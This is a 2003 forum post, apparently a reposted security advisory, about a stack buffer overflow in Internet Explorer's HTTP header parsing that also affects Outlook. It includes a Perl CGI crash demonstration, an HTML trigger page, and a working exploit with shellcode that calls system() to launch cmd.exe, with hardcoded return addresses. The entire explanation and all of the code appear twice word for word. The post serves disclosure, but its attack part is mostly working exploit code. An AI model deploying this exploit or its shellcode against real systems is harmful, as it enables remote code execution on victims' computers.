admin
07-04-2003, 12:38 PM
As we reported in our previous article: Buffer Overflow in Internet Explorer's HTTP Parsing Code, a buffer overflow vulnerability allows remote attackers to cause the browser to execute arbitrary code. The following is a more technical explanation of the issue and an exploit code for the mentioned vulnerability.
==============================================
The buffer overflow happens when a program using the vulnerable DLL (Internet Explorer, Outlook, possibly others) receives an HTTP reply which has excessively long values in both "Content-type" and "Content-encoding" fields.
By exploiting this vulnerability, an attacker can run arbitrary code on a victim's computer when a malicious web page or an HTML mail message is viewed. Starting up Outlook may be enough to trigger the exploit, since the program may open a preview of the first new message on startup.
No scripting, ActiveX, or even an IFRAME is needed - an IMG tag is enough. For this reason Security Zone settings don't have effect on this flaw. For some reason an IMG tag seems to be in fact required in order to produce an exploitable buffer overflow. If the malicious HTTP reply comes with a normal HTML document, Internet Explorer hangs or just exits without any comment.
If the requirements are met (both header fields containing correctly sized values, IMG tag used), the issue reduces to a trivial stack-based buffer overflow. The return address is overwritten by the "Content-encoding" value. An appropriate length for the values seems to be about 300 bytes.
Sample:
To reproduce the buffer overflow, these files can be used:
CGI:
#!/usr/bin/perl
#
# Name this file as "urlmon-bo.cgi"
#
$LONG="A"x300;
print "Content-type: $LONG\r\n";
print "Content-encoding: $LONG\r\n";
print "\r\n";
HTML:
< html>
< body>
< img src="urlmon-bo.cgi">
</body>
</html>
If you view the HTML file with Internet Explorer on a vulnerable system, the program will crash with EIP=0x41414141 (this at least happened on various test systems). The actual exploit is left as an excercise.
Exploit:
SecurITeam Experts have prepared a working exploit code for the vulnerability, the exploit will simply cause a cmd.exe to popup:
#!/usr/bin/perl
#
# SecurITeam Experts
# Based upon urlmon-bo.cgi by Jouko Pynnnen
#
$shellcode = join ("",
"\x90", # - NOP
# "\xCC", # - INT3
"\x90", # - NOP
"\x90", # - NOP
"\x90", # - NOP
"\x90", # - NOP
"\x8B\xEC", # - MOV EBP, ESP
"\x55", # - PUSH EBP
"\x8B\xEC", # - MOV EBP, ESP
"\x33\xFF", # - XOR EDI, EDI
"\x57", # - PUSH EDI
"\x83\xEC\x04", # 0 SUB ESP, 4
"\xC6\x45\xF8\x63", # - MOV BYTE PTR SS:[EBP-8],63h
"\xC6\x45\xF9\x6D", # - MOV BYTE PTR SS:[EBP-7],6Dh
"\xC6\x45\xFA\x64", # - MOV BYTE PTR SS:[EBP-6],64h
"\xC6\x45\xFB\x2E", # - MOV BYTE PTR SS:[EBP-5],2Eh
"\xC6\x45\xFC\x65", # - MOV BYTE PTR SS:[EBP-4],65h
"\xC6\x45\xFD\x78", # - MOV BYTE PTR SS:[EBP-3],78h
"\xC6\x45\xFE\x65", # - MOV BYTE PTR SS:[EBP-2],65h
"\xB8\xC3\xAF\x01\x78", # - MOV EAX, MSVCRT.system
"\x50", # - PUSH EAX
"\x8D\x45\xF8", # - LEA EAX, DWORD PTR SS:[EBP-8]
"\x50", # - PUSH EAX
"\xFF\x55\xF4", # - CALL DWORD PTR SS:[EBP-C]
"\x5F" # - POP EDI
);
# $eip = "\x41\xDD\x6C\x03"; # Sometimes this works
$eip = "\x41\xDD\xE9\x02"; # Sometimes this works (this worked more times than the previous one : ) )
$LONG=join ("", "A"x(300-length($shellcode)), $shellcode, $eip);
print "Content-type: $LONG\r\n";
print "Content-encoding: $LONG\r\n";
print "\r\n";
==============================================
The buffer overflow happens when a program using the vulnerable DLL (Internet Explorer, Outlook, possibly others) receives an HTTP reply which has excessively long values in both "Content-type" and "Content-encoding" fields.
By exploiting this vulnerability, an attacker can run arbitrary code on a victim's computer when a malicious web page or an HTML mail message is viewed. Starting up Outlook may be enough to trigger the exploit, since the program may open a preview of the first new message on startup.
No scripting, ActiveX, or even an IFRAME is needed - an IMG tag is enough. For this reason Security Zone settings don't have effect on this flaw. For some reason an IMG tag seems to be in fact required in order to produce an exploitable buffer overflow. If the malicious HTTP reply comes with a normal HTML document, Internet Explorer hangs or just exits without any comment.
If the requirements are met (both header fields containing correctly sized values, IMG tag used), the issue reduces to a trivial stack-based buffer overflow. The return address is overwritten by the "Content-encoding" value. An appropriate length for the values seems to be about 300 bytes.
Sample:
To reproduce the buffer overflow, these files can be used:
CGI:
#!/usr/bin/perl
#
# Name this file as "urlmon-bo.cgi"
#
$LONG="A"x300;
print "Content-type: $LONG\r\n";
print "Content-encoding: $LONG\r\n";
print "\r\n";
HTML:
< html>
< body>
< img src="urlmon-bo.cgi">
</body>
</html>
If you view the HTML file with Internet Explorer on a vulnerable system, the program will crash with EIP=0x41414141 (this at least happened on various test systems). The actual exploit is left as an excercise.
Exploit:
SecurITeam Experts have prepared a working exploit code for the vulnerability, the exploit will simply cause a cmd.exe to popup:
#!/usr/bin/perl
#
# SecurITeam Experts
# Based upon urlmon-bo.cgi by Jouko Pynnnen
#
$shellcode = join ("",
"\x90", # - NOP
# "\xCC", # - INT3
"\x90", # - NOP
"\x90", # - NOP
"\x90", # - NOP
"\x90", # - NOP
"\x8B\xEC", # - MOV EBP, ESP
"\x55", # - PUSH EBP
"\x8B\xEC", # - MOV EBP, ESP
"\x33\xFF", # - XOR EDI, EDI
"\x57", # - PUSH EDI
"\x83\xEC\x04", # 0 SUB ESP, 4
"\xC6\x45\xF8\x63", # - MOV BYTE PTR SS:[EBP-8],63h
"\xC6\x45\xF9\x6D", # - MOV BYTE PTR SS:[EBP-7],6Dh
"\xC6\x45\xFA\x64", # - MOV BYTE PTR SS:[EBP-6],64h
"\xC6\x45\xFB\x2E", # - MOV BYTE PTR SS:[EBP-5],2Eh
"\xC6\x45\xFC\x65", # - MOV BYTE PTR SS:[EBP-4],65h
"\xC6\x45\xFD\x78", # - MOV BYTE PTR SS:[EBP-3],78h
"\xC6\x45\xFE\x65", # - MOV BYTE PTR SS:[EBP-2],65h
"\xB8\xC3\xAF\x01\x78", # - MOV EAX, MSVCRT.system
"\x50", # - PUSH EAX
"\x8D\x45\xF8", # - LEA EAX, DWORD PTR SS:[EBP-8]
"\x50", # - PUSH EAX
"\xFF\x55\xF4", # - CALL DWORD PTR SS:[EBP-C]
"\x5F" # - POP EDI
);
# $eip = "\x41\xDD\x6C\x03"; # Sometimes this works
$eip = "\x41\xDD\xE9\x02"; # Sometimes this works (this worked more times than the previous one : ) )
$LONG=join ("", "A"x(300-length($shellcode)), $shellcode, $eip);
print "Content-type: $LONG\r\n";
print "Content-encoding: $LONG\r\n";
print "\r\n";